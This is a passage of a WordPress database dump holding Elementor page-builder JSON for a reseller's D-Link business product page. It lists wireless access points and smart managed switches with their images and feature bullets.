]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7656,3422,'_elementor_version','2.5.14'),(7657,3422,'_elementor_edit_mode','builder'),(7660,3423,'_wp_page_template','template-fullwidth.php'),(7661,3423,'_elementor_template_type','post'),(7662,3423,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ec8985\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":494,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"7a7732d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE 